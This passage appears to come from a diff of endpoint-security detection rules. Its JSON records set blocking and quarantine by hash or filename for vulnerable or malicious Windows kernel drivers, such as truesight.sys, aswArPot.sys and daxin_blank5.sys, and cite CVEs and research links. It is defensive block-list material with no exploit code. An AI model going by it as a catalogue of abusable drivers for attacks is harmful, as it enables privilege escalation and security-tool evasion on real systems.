+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc871d60b9e47e6f3b41abdbc43e7754888d9c72e11877188919582cbba266a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49722c51-7f78-546d-925b-fc93bab9f384",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817714Z",
+ "creation_date": "2026-03-23T11:45:30.817718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817727Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fe475d3082a0226ae9fa945542ac3e0cb5214c0f44193dcff12514cadf52101",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "497b38a1-ddad-5c72-9e6f-3f2f3277a6d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809901Z",
+ "creation_date": "2026-03-23T11:45:31.809903Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b411b159a3b4de03f801fe44f1712a5881f8ed9640cae3ac1a4605972df08ab0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "497f875d-8af8-5196-94ab-af6304af35e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476968Z",
+ "creation_date": "2026-03-23T11:45:30.476972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476980Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30accf1de5969ff5bf958786b9c9deb9001d1a19d121aac8b3c92c5b463a087e",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "499da550-17d7-53bc-9324-ca8bca8375f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616703Z",
+ "creation_date": "2026-03-23T11:45:29.616705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9c290ffc007e94fb61aecff42d267c1e626ec7939025b1a7d7285441d1c490d",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49b1d6a8-50bf-5d5b-83f9-a81ce874666d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981093Z",
+ "creation_date": "2026-03-23T11:45:29.981096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981101Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0ae3349ebaac9a99c47ec55d5f7de00dc03bd7c5cd15799bc00646d642aa8de",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49bd1ec5-5af3-5f87-b261-9b4fea7c94df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484025Z",
+ "creation_date": "2026-03-23T11:45:31.484029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5339fb0bd4386b1c0606e67b43971737f2758983f745b772975ac04fcad7c6ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49c6d95a-5d8d-5aa7-a881-6f13903df38d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152603Z",
+ "creation_date": "2026-03-23T11:45:31.152605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e32cf0b4a39994f1a269d04db6724b5d2561620a0a69ca9e0e9c8e77461ba959",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49cf91f3-7f95-5919-9f88-573a2a808fba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982590Z",
+ "creation_date": "2026-03-23T11:45:29.982592Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "954789c665098cf491a9bdf4e04886bad8992a393f91ccbca239bff40cc6dca6",
+ "comment": "Malicious Kernel Driver (aka daxin_blank5.sys) [https://www.loldrivers.io/drivers/0590655c-baa2-481a-b909-463534bd7a5e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49e9e1a8-d3fd-5fef-aa68-c03650b99b6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611481Z",
+ "creation_date": "2026-03-23T11:45:29.611483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611488Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16398965e9cea179b2e5ca884e3af032dece08d4ef33bdd83234ee441d71a5fa",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49f7cb42-d428-552d-ac24-0675ceadd54c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619405Z",
+ "creation_date": "2026-03-23T11:45:29.619407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed68f30f8246730c2b57495ed1db1480350d879b01d070999d35f38630865f5c",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49fa907d-46c3-5f32-ac96-4dc766ff34b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607112Z",
+ "creation_date": "2026-03-23T11:45:29.607114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607119Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "filename",
+ "value": "PROCEXP152.SYS",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "49fd9125-5efd-5e05-b079-f1e2d3104437",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612300Z",
+ "creation_date": "2026-03-23T11:45:29.612301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a4f7d7926efc3e3488758ce318246ea78a061bde759ec6c906ff005dd8213e5",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a20e869-0796-5ca6-b994-d781bb8ef324",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831290Z",
+ "creation_date": "2026-03-23T11:45:30.831292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "789854191b0b6550656d0f5f939fb8213ac3d7e32620fe794af66f529819a197",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a3da3a0-1dec-5a35-ba5b-100979e858a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610655Z",
+ "creation_date": "2026-03-23T11:45:29.610657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "900dd68ccc72d73774a347b3290c4b6153ae496a81de722ebb043e2e99496f88",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a492d3a-efd6-51b0-9877-4bc191f4e884",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142452Z",
+ "creation_date": "2026-03-23T11:45:31.142454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b112d137a73e931e1eac4d66d981cc5750e095741a97970bc37e4063b6edbc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a4a32c4-64ce-502b-be9c-7516978f4d6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968648Z",
+ "creation_date": "2026-03-23T11:45:29.968651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6521a35800da601f76fe2a8270f6cac17eb491535abf362669f4e2e6c8e155f7",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a5ba789-a8da-5098-a952-17498fff2d31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832606Z",
+ "creation_date": "2026-03-23T11:45:30.832608Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d30609e8e3519fe199762adfc696ccccd9b685a7377ca18addd342c15fa28c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a65b4cf-74fe-5492-849f-706b49a8f0ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968686Z",
+ "creation_date": "2026-03-23T11:45:29.968688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fb5bc9c51f6872de116c7db8a2134461743908efc306373f6de59a0646c4f5d",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a6d894d-a175-5fbf-b094-963679cf16dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821106Z",
+ "creation_date": "2026-03-23T11:45:30.821109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821118Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "386745d23a841e1c768b5bdf052e0c79bb47245f9713ee64e2a63f330697f0c8",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a6e72cd-c4a9-5f80-8082-15041d7ffcb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606505Z",
+ "creation_date": "2026-03-23T11:45:29.606507Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa959c48c055ec149d434a5adeb9f9938d1c260a65ee8a4ea1d67bfbdceab83f",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a7b1e46-04f3-59d2-a30e-bdf5132eff22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471597Z",
+ "creation_date": "2026-03-23T11:45:31.471600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471609Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb53959c71aa4cc446e6424b17440292c77d6c7fa88ce9503670a0a0cbe8ccb7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a89f099-894f-5d46-8871-bbed0765c18b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981454Z",
+ "creation_date": "2026-03-23T11:45:29.981456Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bf01cd6d55502838853851703eb297ec71361fa9a0b088a30c2434f4d2bf9c6",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a8c4c2d-8dee-5211-a23e-07344c9a4799",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
